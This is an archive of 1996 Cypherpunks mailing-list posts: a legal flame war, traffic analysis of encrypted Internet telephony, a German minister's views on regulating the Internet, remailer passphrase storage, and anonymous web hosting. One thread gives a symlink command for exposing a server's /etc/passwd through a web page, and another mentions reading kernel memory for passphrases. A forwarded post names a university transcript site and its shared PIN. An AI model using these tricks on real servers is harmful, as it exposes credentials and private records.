From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Mar 1996 01:25:46 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [noise] Re: Do you feel lucky, punk?
In-Reply-To: <m0twHPF-00091DC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960311213348.11349A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Mar 1996, jim bell wrote:

> At 05:54 PM 3/11/96 -0500, Black Unicorn wrote:
> >
> >
> >[rant including some very dubious abstracts of legal opinions deleted]
> >
> >Not only is your law poor and badly reasoned,
> 
> Just what George Will said about this recent Bennis SC decision.

My issue was with your application of the cite and decisions to the 
pending bill.  (Perhaps if you are not qualified to make your own 
comments about court cases, and limited to citing the critiques of 
others, you should refrain from making inferences as to their likely or 
unlikely application to other legal issues).

> > your mastery of  the jurisprudence of forfeiture law flawed,
> 
> Ditto, and I notice you give no specific examples.  Why is that?

My issue was, again, with regard to your choice of cites, the way you 
chose to apply them to represent a general (and flawed) attitude toward 
statuatory construction, and the manner in which you try to mold all of 
the above in a way suggesting it has the least bit to do with the bill in 
question.

But, for the sake of equality, let's examine some of your legal assertions.  
Or, more accurately, legal conclusions.  (BTW, where is your J.D. from?)

1> In fact, I would argue that a remailer operator will actually be 
considered MORE responsible, legally, than Mrs. Bennis:

2> I argue that a person who runs an anonymous encrypted remailer could be
clearly claimed to be  "entrusting" that "property" to someone else, under
the meaning of the above paragraph.

The "above paragaph," incidently, doesn't even rise to the level of court 
dicta, but is a abstract of dicta by a court commentator.  Using such 
authority to back a legal conclusion (especially when applied to an 
entirely seperate legal area) is twisted at best, and dangerous at worst.

3> At least, that is the position the prosecutors could surely take, 
especially given this Supreme Court decision.

Uh huh.  They might also take the position that the defendent is ugly, 
and should be convicted.  That doesn't make it a legally viable argument.

> 
> > and your rhetoric twisted, 
> 
> Again, you give no specific examples.  And what is "twisted rhetoric", at 
> least as you've used it here?

I'm not going to delve into semantics or be distracted by a war of the 
dictionaries.  You proport to be knowledgeable in these areas, and yet 
say nothing of value.  Your appeal (what of it there is) is based 
entirely on skewing meanings, using critiques of dicta, and generally 
applying inflamatory language taken out of context in a manner which suits 
you.  I don't think I'm off base calling it "twisted."

> 
> >but you don't seem to know the difference between dicta and holdings.
> 
> I didn't use either term.  Neither did George Will.

Perhaps you should have.  It would have set of the alarm bells of others 
who might have been looking at your work with anything like a critical 
eye and saved them the time of reading the trash.

> Maybe you read that item too rapidly to notice that most of it was George 
> Will's column, not my wording.  

Again, its application to the bill is what I question.  All of which 
throws your understanding of law, dicta, holdings, jurisprudence, and 
rhetoric into question.  What you should have cited was some statuatory 
construction and legislative history cases, not forfeiture law.  But how 
could you be expected to know this?

> BTW, I get particularly suspicious when people "respond" 
> to my posts and quote NOTHING that I have said.

I delete fluff from my postings as a matter of courtsey to the readers.  
This is a habit you do not seem to share with me.

  This seems to be a pattern: 

I guess I'm not the only one who thinks your prose has the bouquet of 
rotting herring.

>  The person clearly disagrees with my position in general, but can't cite 
> specifics and in fact studiously avoids them.  Padgett Peterson is an expert 
> at this, it appears you're trying to emulate him. 

I do not know Mr. Peterson, nor am I familiar with his works.  I deleted 
a bunch of useless gibberish, commenting in the process on its general 
unsuitability in the context of the post.

> What, then, was the point of sending me the note, as well as wasting 
> bandwidth on CP to share your unhappiness?

Distribution of reputation capital (or in this case, negative reputation 
capital).  I believe I also wanted to make a point (in 1,200 bytes) about 
the utility (or lack thereof) of your article (10,500 bytes) on this list.

Perhaps in the process I might save a newcomer from the unfortuante and 
embarassing fate of actually lending some authority to anything you have 
to say.

> Jim Bell
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Mar 1996 14:25:57 +0800
To: rittle@comm.mot.com
Subject: Re: FCC & Internet phones
In-Reply-To: <9603120137.AA17060@supra.comm.mot.com>
Message-ID: <199603120321.WAA05010@homeport.org>
MIME-Version: 1.0
Content-Type: text


Loren James Rittle wrote:

| >Most
| >presumably use a mix of a UDP data connection and tcp for control
| >functions.
| 
| OK, everything after the IP header is encrypted.  I don't even know
| which protocol is in use.

	Are you willing to play Mallet?  Drop IP packets, and look for
duplicates.  Those are TCP.  (IPSEC might handle this, but I bet there
will be broken implementations that save time by resending.)

| >They all consist of high volume, long duration connections
| >(or data flows in the case of UDP.)  Many probably use a standardized
| >destination port.
| 
| OK, everything after the IP header is encrypted.  I don't know
| which port is in use.

	Which doesn't change the nature of the data, which is:

	Alice sends long (3-60 second) heavy flows to Bob.
	Alice's flow stops, Bobs picks up.
	repeat.

| In short, assuming IPSEC, the data stream cannot be easily found.
| Slightly different assumptions led to a radically different outcome.

	First, assume a can opener.  :)

	Actually, I'll bet you I can pick out your encrypted data for
the common case, which will continue to be a modem, which can't handle
heavy back traffic flows for the sake of hiding who is speaking.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Mar 1996 16:48:39 +0800
To: cypherpunks@toad.com
Subject: The Future of Electronic Commerce
Message-ID: <199603120357.WAA25093@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


"The Future of Electronic Commerce," released March 11 by The 
Aspen Institute's Communications and Society Program, describes 
the new economics of transacting business in cyberspace, from 
consumer privacy to potential advantages for entrepreneurs.


The 270 kb report in .PDF format is available at:


     http://www.aspeninst.org.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Wed, 13 Mar 1996 03:28:24 +0800
To: cypherpunks@toad.com
Subject: German minister predicts collapse of governments
Message-ID: <199603112206.XAA00179@idril.shnet.org>
MIME-Version: 1.0
Content-Type: text/plain


 German Minister of Justice: Governments' attempts to regulate the
 internet on their own are nonsensical, technically and economically.
 National states are obsolete. A crypto ban cannot be enforced.

The German news magazine DER SPIEGEL features a story about the internet, with
33 pages of the usual hype. However, there is a remarkable interview with the
German Minister of Justice, Edzard Schmidt-Jortzig:

The minister says that he is not glad about always having to talk about
control when concerned with the internet. According to him, the internet has
been getting on without any special laws. The discussion about pornography and
blocking programs reminds him of the discussion about the "dangerous device
TV" in his youth.

The state has legitimate interests in regulations, he says, but it is
"nonsensical, when those attempts are restricted to one country. The internet
has no borders. What is illegal in one state will simply be served to the net
elsewhere." He admits that in a way he is happy about that: "This whole
discussion still is at its very beginning."

Conceivably, providers could be obliged to block pages with illegal contents
to their customers, Schmidt-Jortzig says. However, such a step, performed by
the government on its own, would hardly make sense technically and
economically: Instead of going through the exteme effort of controlling the
contents, providers would simply move to countries such as Andorra,
Liechtenstein or Luxemburg. That would only increase telephone bills for the
customers, but Germany would lose many innovative businesses and jobs.

Propaganda from overseas could only be avoided by a world-wide convention or
UN treaty, but he does not expect any such things for the next 10 years.
Facing the development of technology, "our thinking in national categories
is no longer adequate. That way, we will not be able to control the net. I
rather think that we will have to say good-bye to the idea of enforcing
German law on the internet."

Of course, Nazi propaganda or child pornography would remain illegal in
Germany, but the question were if it can be enforced. "I can already imagine
those users sending their paroles and pamphletes to the net from Luxemburg,
deriding the helpless German authorities. I don't really think that
is great, but I don't see any solution."

"I think the internet with its unlimited possibilites of communication and its
anarchistic structure is one of the most amazing challenges the state
currently has to face. Faster than we would have thought, the traditional
national state will prove obsolete. A legislation ending at the borders of a
certain territory will be increasingly hard to defend." He knows that many
will find it difficult to bear, says Schmidt-Jortzig, "but we cannot outlaw
the internet only because it does not fit with the conception of life of some
[people living in yesterday's world]. Not even the Chinese can."

The idea of the global citizen in the internet, who no loger has to cope with
national ideas, is a nice vision, he says, but still very unrealistic. For
some time, national states would remain authoritative and defend their
function. "But I am afraid that this stuggle will eventually fail."

Schmidt-Jortzig says that the Bavarian prosecutors' proceed against CompuServe
has been absolutely legitimate, but if they will be sentenced were a totally
different question, because the accused had no way of verifying every internet
resource.

In a global community, there could be something like a net police. German
controls however, would be totally senseless today: "If I really were to
regulate the internet with laws and prohibition in spite of all argumentation,
then I would certainly need such control, a new federal Data Police. But I
think nobody would have such absurd an idea, as everyone knows that would
also mean the death of this innovative business field in Germany."

The state could not care for fully effective privacy on the net, but may have
to inform about the threads towards privacy. Schmidt-Jortzig does not see any
reason for banning encryption software the police cannot break: "Why should I
outlaw that on this still rather insecure media, people encrypt their private
mail, and be it only the results of the federal league." - "Even if I
wanted to, I could hardly enforce that ban. You can download encryption
programs for free on the internet. Meanwhile, there even is software that
allows you to undetectibly hide a message in normal e-mail. The state is
participating in a persuit race that it cannot win at all. Of course that does
not exempt us from having to try to persue in the beginning."

Asked about criminals using encryption, he says that he knows there will be
large scepticism if the state gives up that quickly. "Only, I am afraid that
those who work against this development will eventually have to lay down
arms. Any attempt to find a national solution will fail."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Mar 1996 07:27:06 +0800
To: Paul Kedrosky <pkedrosk@sms.business.uwo.ca>
Subject: Re: Your "switchboard" listing
Message-ID: <199603120748.XAA09980@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:07 PM 3/11/96 -0500, you wrote:
>Ha! Very funny that you have yourself listed as Mssr Thomas Pynchon in 
>Switchboard's listings. I especially like the mailing address. 

The punctuation was also interesting....
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Mar 1996 19:02:09 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Remailer passphrases
Message-ID: <199603120748.XAA09989@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:16 PM 3/11/96 -0500, "Mark M." <markm@voicenet.com> wrote:
>On Mon, 11 Mar 1996, Gary Howland wrote:
>> The only disadvantage of this is that the remailer cannot be rebooted
>> without a passphrase being entered, but then there are ways around this
>> (entering the passphrase remotely over a secure link etc., or more
>> sophisticated 'remote authorisation' systems).
>> 
>> The advantage of this is that the password is never on the disk,
>> only in memory (which will take serious (read "expensive") to extract).
>
>I don't know that it would be that expensive.  If someone was able to gain
>root access to the system, something like "strings /dev/kmem" could narrow
>the search for the passphrase down significantly.  

Except for special multi-level secure operating systems, and maybe some
fancy capability-based systems, any operating system is going to let
some administrator poke around in memory and on the disk, and if there's
information anywhere on the machine, it can be gotten by the presevering
privileged person.  However, keeping the data off the disk is a very good
start, and RAM-grubbers are far tougher to run on good OSs than disk-grubbers.
Since the remailer has to decrypt data sent to it, it needs the password.

The alternative to keeping the data in RAM or on disk is to keep it on some
board or box hanging of a comm port or bus, such as a spare PC on RS232
running just a remailer application, or a decently self-protecting smart card
in a PCM-CIA slot.  To be really effective, it needs to be running the
remailer application as well as just crypto; otherwise it might be possible
to trick the card into decrypting arbitrary data for you or letting you
snoop the remailer.  On the other hand, if you're not that paranoid, and
just want to do crypto on a card anyway, Matt Blaze did some interesting
protocols
for fast decryption with a CPU assisting a slow smartcard; they're on 
ftp://research.att.com/dist/mab/card_cipher.ps
        M. Blaze, "High-Bandwidth Encryption with Low-Bandwidth
        Smartcards."  January 18, 1995.  PostScript pre-print, to
        appear.


>Of course one could obfuscate the passphrase by XOR'ing it with 0x80,
> but that's only security through obscurity.
You could be a bit more obscure than that if you wanted :-)
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Wed, 13 Mar 1996 07:26:21 +0800
To: Louis Freeh <cypherpunks@toad.com>
Subject: Re: anonymous web pages (Was: SurfWatch)
In-Reply-To: <Pine.SUN.3.91.960312003232.4898A-100000@rwd.goucher.edu>
Message-ID: <MailDrop1.1.960311235738@pax-ca9-24.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Mar 1996 00:35:38 -0500 (EST) jlasser@rwd.goucher.edu (Bruce Zambini) 
wrote:

>On Sun, 10 Mar 1996, Mark M. wrote:
>>From your public html directory, try 'ln -s /etc/passwd passwords.txt'.
>
>Then add a link to your homepage.... 

Er, I believe CERN, NCSA, and N*tscape all disallow following symbolic links by 
default for precisely this reason. There is a follow-symlinks-for-owner-only 
option that we recently turned on.

-rich
 Institute for Ernst Zundel Revisionism
 http://www.c2.org/~rich/Press/Swedish/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 12 Mar 1996 17:47:02 +0800
Subject: Re: Leahy and Mrs. Bemmis (now that's a subject line)
In-Reply-To: <m0twEkp-00091lC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960312003152.11349E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Mar 1996, jim bell wrote:

> At 11:24 AM 3/11/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
> 
> >The Leahy bill is flawed in two areas. Sent a message with proposed wording
> >to Sen. Leahy via his web page but have not gotten a response. Have a bad
> >habit of reading laws without thought since this is how LEA and prosecutors
> >are told to enforce them - as written, not as believed. If an area is
> >vague, a court is required to decide how to interpret it, not LEA. If badly
> >written *everyone* loses.
> 
> Unfortunately, this is not the way CREATIVE prosecutors enforce laws.  
> _THEY_ try to be imaginative, "pushing the envelope" as it were, and expect 
> the courts to stop them.  Sadly, those same courts often have ex-prosecutors 
> as judges, people who aren't particularly inclined to dissuade the abuse of 
> laws.  (exceptions exist, obviously.)

Mr. Bell seems to me, based on what I have observed of his legal 
"analysis" in past, entirely unqualified to be speaking to these issues.
I hope readers will take his comments with a grain of salt, and keep this 
in mind.

> Jim Bell
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Zambini <jlasser@rwd.goucher.edu>
Date: Tue, 12 Mar 1996 20:15:45 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: anonymous web pages (Was: SurfWatch)
In-Reply-To: <Pine.LNX.3.91.960310192841.2110A-100000@gak>
Message-ID: <Pine.SUN.3.91.960312003232.4898A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Mar 1996, Mark M. wrote:

> On Sat, 9 Mar 1996, Dan Cross wrote:
>  
> > This is an interesting idea, though I think a really really insecure one.
> > What's keeping someone from posting ``trojan web pages'' and then waiting
> > for the pages to be soaked up by servers?  Something that says ``click
> > <here> to see the /etc/passwd file for this site!'' which runs some funky
> > CGI thing to cat /etc/passwd or, ``Enter your credit card number to buy
> > super wiz-bang gadget!'' or the like is a really scary, but very real,
> > possibility if great care is not taken in setting this kind of thing up.
> > News servers, on the other hand, don't suffer from this problem because
> > the data which they contain is much more passive in nature (at least, while
> > in the spool..) than HTML.
> 
> The obvious fix would just be to disallow the use of CGI scripts in anonymous
> web pages.  In order for a file to be designated a CGI script, the must
> be explicitly specified as such in the httpd configuration.  The web is
> every bit as passive as Usenet.  The only difference is you can't make a
> program that will execute on the NNTP server everytime it is retrieved (which
> would be the Usenet equivalent of CGI).

Doesn't solve the problem completely, or even the individual example 
given above.

>From your public html directory, try 'ln -s /etc/passwd passwords.txt'.

Then add a link to your homepage.... 
Jon
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Tue, 12 Mar 1996 20:18:37 +0800
To: cypherpunks@toad.com
Subject: bell ringing
Message-ID: <2.2.32.19960311185557.00689588@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've *finally* had a chance to try and catch up on my CyP (vice CoP) reading, including the running tit-for-tat between Jim Bell and (most of) the rest of the list.

While Mr. Bell's Assassination Politics idea has a lot of interesting ramifications, I've found that his apparent in-your-face-and-wha'cha-gonna-do-about-it-PUNK attitude makes reading his postings very tedious.

Perhaps if 'we' were to simply read his postings, and respond *only* to those that maintain a civil tone, it would finally sink in with him that his Terrible Two's antics aren't appreciated.

The only other options I see are:
        Someone gets his snailmail address and sends him a Dale Carnegie book, or
        there's a mass kill-filing, with him as the guest of (dis)honor.

As noted, his AP idea seems worth discussing, I'd be reluctant to lose it. I'd hate to see him turned into LD-2 (Son of LD? :-) because he doesn't seem to have learned Tact and Manners yet.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMURa6sVrTvyYOzAZAQFdyAQAosYKaeQBAUFL/uz1dv+NTCEULmlyRc97
H1Q7jBzJK4mqpEvaYzRBTYl8XMAKkhxl2HaCsVLx6z4zJKnMAteRF7iEN/LO68bs
ncAUBoi1TfhRSkSHL9NgBSIaDBtZ5ZT+HWf3dryBYSBkLmfGnDi6o4DMSDis7hC1
pmsSbPDfjk8=
=lP2I
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Tue, 12 Mar 1996 20:15:48 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptographers against cryptography
Message-ID: <2.2.32.19960311190440.00695bfc@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:23 PM 03/11/96 -0800, Bill Stewart <stewarts@ix.netcom.com> wrote:
>At 09:35 AM 3/11/96 -0800, you wrote:
>>This is the second in a regular series of postings to expose
>>cryptographers and cypherpunks who are either lying to us or
>>making a very serious mistake in there judgement.
>.....
>>B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
>>M. Blaze: mab@crypto.com, mab@research.att.com
>>J. Bizdos: jim@rsa.com
>>S. Safaddar: shabbir@vtw.org
>>D. Weinstein: djw@vplus.com
>>P.. Peterson: padgett@hobbes.orl.mmc.com
>>B. Stewart: stewarts@ix.netcom.com
>
>Oh, boy, now I'm a Tentacle Again!
>But at least I can spell....

Gee, lucky you (not to be confused with Lucky Green :-). Maybe if I study real hard, and practise, and pay attention in school, *I* can make the 7 Worst Enemies List, too! Oh, BOY!

As for spelling, I have it on good Authority that your secret is knowing how to operate your spell-checker.

Dave "Not even a flagellum, nevermind a tentacle" Merriman
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMURc1MVrTvyYOzAZAQEm9AP/XHB/pc3wfkkd9ZoGxduVxxzB4WliFubU
PoDWkF0Gt+O1BSFGvqSJWKGaxYeYqvtBHzRLBE0BYh7ot7curdHWL8/7mrnaNCJV
/QsHIsYl3JvAp/nZckucWUEzSf1BDnzokeH9v2xpwaxT5cWYvCRQLu0Q25EjfZl3
4PyMemghhbA=
=+yQN
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Tue, 12 Mar 1996 21:39:39 +0800
To: cypher punks <cypherpunks@toad.com>
Subject: Electronic Frontiers Wyoming (fwd)
Message-ID: <9603120216.aa04516@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
> From: eagle@nyx.net (eagle)
> Message-Id: <9603121000.AA25993@nyx.net>
> Subject: Electronic Frontiers Wyoming
> To: kellee@uwyo.edu
> Date: Tue, 12 Mar 1996 03:00:23 -0700 (MST)
> Cc: barlow@eff.org (John Perry Barlow), mnemonic@eff.org,
>         brown@eff.org (Dan Brown), mech@eff.org (Stanton McCandlish),
>         ssteele@eff.org, aburt@nyx.net (Andrew Burt),
>         mbarry@stout.entertain.com (Bruce Dane), rcarter@nyx.net (Ron Carter),
>         eagle@armory.com
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> It was nice talking to you at the Information Center in the Union earlier.
> You might like to know that Information Technology in conjunction with
> Administration and Records has seen fit in a convulsion of gross idiocy to
> publish your entire UW transcript on the World Wide Web.  Anyone with your
> social security number and your registration PIN can dowload your entire
> transcript and post it to Usenet News if they so desire, where your grades
> would be replicated in computers, and circling the planet in a few minutes.
> By gross malfecence, the University of Wyoming has seen fit to *PUBLISH* *ALL*
> the Non Degree seeking Graduate Students PIN in the Summer Bulletin; 4723.
> 
> Patrick, who is a non degree seeking grad student, went ballistic when I gave
> him *his* PIN to access his transcript.  The web browser also writes your
> social security number to the screen, so anyone watching over your shoulder
> has all the information they need to violate your right to privacy.  It's
> really stupid to create an HTTP link directly into the cgi-bin as well.
> 
> You can check this out for yourself at Whistle:
> 
> 		http://siswww.uwyo.edu/cgi-win/homepage.exe
> 
> Or wait until the Program Analyst I in charge of computer security at the
> Water Resources Center, (they paid him more money that Math CoSci), writes
> a *scathing* letter to the Branding Iron.  It will be signed Patrick Malone.
> 
> This bit of better living via Electronic Revolution has been brought to you
> by your friendly neighborhood Cypherpunk.
> 
> Jeff  
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.1
> 
> iQCVAwUBMUVKIF4aVg6iEWoBAQETKgQAoL4xnCzIPvccRuJZTxslDXb36qC0Zhhj
> DAK100FlTyAmgc8oxIJjcQ3C1f4qzKVSOj63hBXBrhdpIoIkvE0x8notQuRsl/ua
> sKf6XwVWfl0vAZ2lMUn0/f/GtUU4579NMhsChXnwGADzrHnmzfB3belxVMZzxsyJ
> Xc6wHukVRNU=
> =wVEh
> -----END PGP SIGNATURE-----
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Mar 1996 07:29:32 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [noise] Re: Do you feel lucky, punk?
In-Reply-To: <m0twMLA-00093EC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960312014348.11349F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



This will be my last comment on this thread.

On Mon, 11 Mar 1996, jim bell wrote:

> At 09:59 PM 3/11/96 -0500, Black Unicorn wrote:
> >On Mon, 11 Mar 1996, jim bell wrote:
> >
> >> At 05:54 PM 3/11/96 -0500, Black Unicorn wrote:

> >My issue was with your application of the cite and decisions to the 
> >pending bill.  
> 
> You keep saying this kind of thing, repeatedly, but you don't back it up 
> with a contrary argument.

Why not tell me why you didn't cite rules of statuatory construction, or 
the merit of looking at legislative history?  I'm hardly going to 
spend 4 hours of legal research to rebuke what is a patently flawed 
"legal" opinion.  Long time members of the list will know already that I 
am quite generous with my legal research when a legitimate legal problem 
arises.  My patience does not extend to upstarts who's knowledge of law 
is limited to complaining about how legal scholars and Supreme Court 
Justices have their head up their asses.

> >My issue was, again, with regard to your choice of cites, 
> 
> Ah!  You simply didn't like me using that particular atrocious SC decision 
> to suggest that we can't trust judges and courts in general!  

You dismiss 7 learned people quite quickly.  I know it's tempting to be 
superior to them, but as far as I can tell, you haven't even taken a 
judicial process class in undergrad.

> >The "above paragaph," incidently, doesn't even rise to the level of court 
> >dicta, but is a abstract of dicta by a court commentator.  Using such 
> >authority to back a legal conclusion (especially when applied to an 
> >entirely seperate legal area) is twisted at best, and dangerous at worst.
> 
> Let's suppose we agree that "George Will" is a "court commentator."  Suppose 
> further that he, more or less, says "this decision sucks."  Because it DOES 
> suck.

This illustrates my problem with you, and your writings to the list.  This 
isn't the opinion of a noted legal scholar.  It's not the opinion of a 
renound attorney, or court observer.  It's not even the opinion of a law 
student.  The bottom line is that you just don't know what you're talking 
about.  You are wasting the list's time, my time, and, incidently, your time.

> than I relate) should be of interest.  And most people of ordinary levels of 
> intelligence can recognize that yes, the decision DOES suck.

Excepting 5 surpreme court justices, the prosecution, and hundreds of 
years of American Jurisprudence.  Sure, you're a more legitimate judge of 
decisions.  Really it's just that you don't like the decision, and have 
latched on to anything to justify your dislike with the illusion of 
intelligence and knowledge, including a newspaper article in a local paper.

  And George 
> Will, who has certainly NOT become successful as a commentator by boring the 
> reader, understands that this decision is of interest to enough people to 
> have it occupy one of his columns for a day.

What the hell does this have to do with your long stretch in applying it 
to the Leahy bill?

> Remember, one of the basic assumptions that any supporter of the Leahy bill 
> could be making is that it will be interpreted INTELLIGENTLY by courts.

Wrong.  The assumption is that the rules of statuatory construction and a 
long history of weighing legislative history will be used in intrepreting 
the statute.

I could go on for paragraphs about how this basic error on your part 
demonstrates your misunderstanding of the divisons of labor between 
the Legislative and Judiciary, and that your really calling for an active 
Judiciary that disregards law and imposes its own view in the face of 
obvious legislative intent, and go on longer about the importance of 
using cannons of construction to insure consistancy, but none of that 
would change the basic fact that you just don't know what you are talking 
about, and that arguing with you is like talking to a soap box preacher.  
You don't really care for logic.

  If 
> it is obvious to most of the rest of us that those lunatics can't even make 
> the correct decision about a woman's half-interest in a common automobile, 

Your "logic" has become a campaign speech.

> The fact that you may not _like_ me bringing up a contemporaneous example 
> where the SC stuck their collective heads firmly and completely up their 
> respective asses is irrelevant.  If anything, it shows that you feel the law 
> is and should be above the heads of the average individual, or even the 
> UN-average, intelligent individual who regularly reads editorials in their 
> local newspaper.

No, I just feel it's probably beyond someone who couldn't name 2 cannons 
of statuatory intrepretation to rant on for paragraphs about the impact 
of a supreme court decision on a pending statute.

> 
> Such elitism is disgusting.
> 

I'm not the one calling the Supreme Court a pile of idiots.

> >  Your appeal (what of it there is) is based 
> >entirely on skewing meanings, using critiques of dicta, and generally 
> >applying inflamatory language taken out of context in a manner which suits 
> >you.  I don't think I'm off base calling it "twisted."
> 
> "Inflammatory language"?  The real "inflammatory language" occurs every time 
> a court makes yet another outrageous decision such as the ones you are 
> weakly attempting (and miserably failing) to defend.

I'm not defending the decision at all.  Simply pointing out that it's 
connection to the Leahy bill is non-existant, and that you are a non-entity
when it comes to legal analysis.

> I notice you don't provide an alternative competing interpretation, either 
> of my conclusions or those of George Will.  So how are we to know what 
> "twisted" is if  you can't clearly show something which is "untwisted"?

I'm not interested in the opinion, or Will's explanation of what it 
meant.  I am interested in bringing some sanity to the list by filtering 
out the fluff and bullshit that results when people who know nothing 
about legislation or lawmaking proport to be experts.

I'm sure you, however, would be quite willing to allow a pre-med student 
preform your bypass operation.

> >Again, its application to the bill is what I question.  All of which 
> >throws your understanding of law, dicta, holdings, jurisprudence, and 
> >rhetoric into question.  What you should have cited was some statuatory 
> >construction and legislative history cases, not forfeiture law.  But how 
> >could you be expected to know this?
> 
> I chose my example to display the foolishness of the Supreme Court,

Considering you have never read the opinion, or the briefs of the 
respective parties, and are relying on only the (perhaps legal, perhaps 
not) opinion of a newspaper writer, I think you're on fairly thin ice 
even without my help.

 as well 
> as each and every one of the courts below it that did not properly dispose 
> of that Bennis case.  You find this disturbing.  But it's applicable to ANY 
> law that may someday rely upon a SC decision to overturn or uphold.  
> Anyone considering supporting the Leahy bill had better understand this.  
> Naturally, you want to cover it up.

You assume I support the Leahy Bill.  Quote me.  Where do you find my 
support?  Because I think you should be taken with the grain of salt your 
legal ignorance obviously deserves?  I could care less which side you are 
on, but I'm hardly going to let your ignorance be taken for anything but 
what it is.

> >> What, then, was the point of sending me the note, as well as wasting 
> >> bandwidth on CP to share your unhappiness?
> >
> >Distribution of reputation capital (or in this case, negative reputation 
> >capital).  I believe I also wanted to make a point (in 1,200 bytes) about 
> >the utility (or lack thereof) of your article (10,500 bytes) on this list.
> 
> I'd glad to see you distributing YOUR "negative reputation capital."  Why 
> not do a better job for yourself and make it look like you are actually more 
> familiar with the legal system than the rest of us are (which shouldn't be 
> hard, if you have the credentials), and challenge us with an alternative 
> explanation of the facts I (and George Will) describe?

1>  I have often lent my legal expertise to the list.
2>  I don't care what you or George Will think the seizure decision 
means, only that it has nothing to do with the Leahy bill.
3>  Challenging you is like falling off a log.

> In other words, stop just saying I'm wrong and start DEMONSTRATING it.

